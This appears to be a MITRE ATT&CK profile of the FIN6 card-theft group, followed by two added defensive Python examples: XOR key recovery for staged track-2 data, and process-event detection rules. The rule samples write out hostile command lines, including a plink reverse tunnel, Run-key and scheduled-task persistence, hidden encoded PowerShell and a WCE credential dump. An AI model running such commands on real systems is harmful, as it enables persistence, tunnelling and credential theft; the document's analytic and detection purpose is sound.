FIN6

FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors. [1]

ID: G0037
Aliases: FIN6
Version: 1.0

Alias Descriptions

Name | Description
FIN6 | [1]

Techniques Used

Domain | ID | Name | Use
Enterprise | T1087 | Account Discovery | FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.[1]
Enterprise | T1119 | Automated Collection | FIN6 has used a script to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.[1]
Enterprise | T1003 | Credential Dumping | FIN6 has used Windows Credential Editor for credential dumping, as well as Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.[1]
Enterprise | T1002 | Data Compressed | Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.[1]
Enterprise | T1022 | Data Encrypted | TRINITY malware used by FIN6 encodes data gathered from the victim with a simple substitution cipher and a single-byte XOR using the key 0xAA.[1]
Enterprise | T1074 | Data Staged | TRINITY malware used by FIN6 identifies payment card track data on the victim and copies it to a local file in a subdirectory of C:\Windows\. Once the malware has collected the data, FIN6 actors compress it and move it to another staging system before exfiltration.[1]
Enterprise | T1068 | Exploitation for Privilege Escalation | FIN6 has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to gain kernel-level privileges.[1]
Enterprise | T1046 | Network Service Scanning | FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.[1]
Enterprise | T1086 | PowerShell | FIN6 has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.[1]
Enterprise | T1060 | Registry Run Keys / Startup Folder | FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.[1]
Enterprise | T1076 | Remote Desktop Protocol | FIN6 used RDP to move laterally in victim networks.[1]
Enterprise | T1018 | Remote System Discovery | FIN6 used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.[1]
Enterprise | T1053 | Scheduled Task | FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and PoS malware known as TRINITY.[1]
Enterprise | T1064 | Scripting | FIN6 has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener. FIN6 has also used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.[1]
Enterprise | T1071 | Standard Application Layer Protocol | FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.[1]
Enterprise | T1032 | Standard Cryptographic Protocol | FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.[1]
Enterprise | T1078 | Valid Accounts | To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes.[1]
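
The Data Encrypted and Data Staged rows above describe TRINITY applying a simple substitution cipher and a single-byte XOR with key 0xAA to track data before it is written to a file under C:\Windows\. The following is an added example, not FIN6's code and not part of the ATT&CK entry: it models only the XOR layer (the substitution table is not given on this page) and shows how an analyst handed a staged file can recover the key without knowing it, because track-2 data has a rigid structure (start sentinel ';', 13 to 19 digit PAN, '=' separator, YYMM expiry, end sentinel '?') and a Luhn-valid PAN. The sample records are constructed from industry test card numbers, and the function names are this example's own.

```python
# Added example (not FIN6 tooling, not ATT&CK content): recovering single-byte
# XOR-encoded payment card track-2 records from a staged file.
#
# The page says TRINITY applies a substitution cipher and a single-byte XOR with
# key 0xAA. The substitution table is not on the page, so only the XOR layer is
# modelled here (an assumption of this example). Track-2 structure plus a Luhn
# check lets us pick the key out of all 256 candidates.
import re
from typing import List, Optional, Tuple

# Track-2 layout (ISO/IEC 7813): ';' PAN '=' YYMM service-code/discretionary '?'
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})\d*\?")


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; encoding and decoding are the same operation."""
    return bytes(b ^ key for b in data)


def luhn_ok(pan: str) -> bool:
    """Luhn checksum, used to discard regex matches that are not real PANs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_track2(plain: bytes) -> List[Tuple[str, str]]:
    """Return (PAN, YYMM) for every structurally valid, Luhn-valid track-2 record."""
    found = []
    for m in TRACK2_RE.finditer(plain):
        pan, exp = m.group(1).decode(), m.group(2).decode()
        if luhn_ok(pan):
            found.append((pan, exp))
    return found


def recover_xor_key(blob: bytes) -> Optional[Tuple[int, List[Tuple[str, str]]]]:
    """Brute-force the single-byte key; the key yielding the most valid records wins."""
    best: Optional[Tuple[int, List[Tuple[str, str]]]] = None
    for key in range(256):
        hits = find_track2(xor_bytes(blob, key))
        if hits and (best is None or len(hits) > len(best[1])):
            best = (key, hits)
    return best


def mask_pan(pan: str) -> str:
    """Keep only the BIN and last four digits when reporting recovered PANs."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


# Constructed sample (not captured data): two records built from industry test PANs.
SAMPLE_PLAINTEXT = (
    b"TERM01 ;4111111111111111=25121010000000000000?\r\n"
    b"TERM02 ;5500000000000004=26061010000000000000?\r\n"
)
# What the staged file looks like after the XOR layer with the key named on the page.
STAGED_BLOB = xor_bytes(SAMPLE_PLAINTEXT, 0xAA)

if __name__ == "__main__":
    result = recover_xor_key(STAGED_BLOB)
    if result is None:
        print("no track-2 structure found under any single-byte key")
    else:
        key, records = result
        print(f"recovered key 0x{key:02X}, {len(records)} record(s)")
        for pan, exp in records:
            print(f"  {mask_pan(pan)} exp {exp[2:]}/{exp[:2]}")
```

The Luhn filter matters: with a 256-key search, a bare regex over arbitrary bytes will occasionally produce a digit run that looks like a PAN, and the checksum removes most of those before a wrong key is scored. Output is masked because a recovered staging file is cardholder data and should not be pasted into a ticket in full.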

Software

ID | Name | Techniques
S0029 | PsExec | Service Execution, Windows Admin Shares
S0005 | Windows Credential Editor | Credential Dumping
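
Most of the behaviour in the Techniques and Software tables (osql.exe reconnaissance, Plink SSH tunnels, Registry Run keys, scheduled tasks, the Metasploit PowerShell module, Windows Credential Editor, PsExec) is visible in process-creation telemetry. The following is an added example, not FIN6 tooling, not ATT&CK content and not a vendor's rule set: a small set of predicates over process-creation events, run against constructed sample events. Field names follow the common Image / CommandLine / ParentImage naming of Sysmon Event ID 1, technique names are taken from the tables above, and the command-line patterns each rule looks for are this example's own assumptions about how the listed tools are typically invoked.

```python
# Added example (not FIN6 tooling, not ATT&CK content, not a product rule set):
# matching process-creation events against the tradecraft listed on this page.
# Event field names follow Sysmon Event ID 1; the events are constructed.
import json
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]


def image_is(ev: Event, exe: str) -> bool:
    """True if the process image's file name equals exe (case-insensitive)."""
    return ev.get("Image", "").lower().rsplit("\\", 1)[-1] == exe


def cmd(ev: Event) -> str:
    return ev.get("CommandLine", "").lower()


# (rule name, technique name as listed on this page, predicate). The command-line
# patterns are this example's assumptions, not observed FIN6 command lines.
RULES: List[Tuple[str, str, Callable[[Event], bool]]] = [
    ("osql_ad_sql_recon", "Network Service Scanning / Remote System Discovery",
     lambda ev: image_is(ev, "osql.exe")),
    ("plink_tunnel", "Standard Application Layer Protocol / Standard Cryptographic Protocol",
     lambda ev: image_is(ev, "plink.exe") and re.search(r"\s-(r|l|d|n)\b", cmd(ev)) is not None),
    ("run_key_persistence", "Registry Run Keys / Startup Folder",
     lambda ev: image_is(ev, "reg.exe") and "\\currentversion\\run" in cmd(ev)),
    ("scheduled_task_create", "Scheduled Task",
     lambda ev: image_is(ev, "schtasks.exe") and "/create" in cmd(ev)),
    ("powershell_download_or_encoded", "PowerShell",
     lambda ev: image_is(ev, "powershell.exe")
     and any(s in cmd(ev) for s in ("downloadstring", "downloaddata", "-encodedcommand", " -enc "))),
    ("wce_credential_dump", "Credential Dumping",
     lambda ev: image_is(ev, "wce.exe")),
    ("psexec_service_binary", "Service Execution",
     lambda ev: image_is(ev, "psexesvc.exe") or image_is(ev, "psexec.exe")),
]


def match_events(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Parse JSON event lines; return (line index, rule name, technique) for each hit."""
    hits = []
    for idx, line in enumerate(lines):
        ev = json.loads(line)
        for name, technique, pred in RULES:
            if pred(ev):
                hits.append((idx, name, technique))
    return hits


# Constructed sample events (JSON lines), not real telemetry. Hosts and paths are made up.
SAMPLE_EVENTS = [
    r'{"Image": "C:\\Tools\\osql.exe", "CommandLine": "osql.exe -E -S sqlsrv01 -Q \"select name from master..sysdatabases\"", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}',
    r'{"Image": "C:\\Users\\Public\\plink.exe", "CommandLine": "plink.exe -N -R 3389:127.0.0.1:3389 -pw secret root@203.0.113.10", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}',
    r'{"Image": "C:\\Windows\\System32\\reg.exe", "CommandLine": "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v upd /t REG_SZ /d C:\\Users\\Public\\upd.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}',
    r'{"Image": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks /create /sc onlogon /tn Updater /tr C:\\Users\\Public\\upd.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}',
    r'{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgA", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}',
    r'{"Image": "C:\\Users\\Public\\wce.exe", "CommandLine": "wce.exe -w", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}',
    r'{"Image": "C:\\Windows\\PSEXESVC.exe", "CommandLine": "C:\\Windows\\PSEXESVC.exe", "ParentImage": "C:\\Windows\\System32\\services.exe"}',
    r'{"Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt", "ParentImage": "C:\\Windows\\explorer.exe"}',
    r'{"Image": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks /query /fo LIST", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}',
    r'{"Image": "C:\\Windows\\System32\\reg.exe", "CommandLine": "reg query HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tcpip", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}',
]

if __name__ == "__main__":
    for idx, name, technique in match_events(SAMPLE_EVENTS):
        print(f"event {idx}: {name} ({technique})")
```

Each rule here is deliberately narrow and names the page's technique so an analyst can map a hit back to the profile; in production these would be tuned against a baseline (osql.exe and schtasks /create are legitimate on database and admin hosts), and the osql and PsExec rules in particular are only useful when combined with parent process and account context.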

References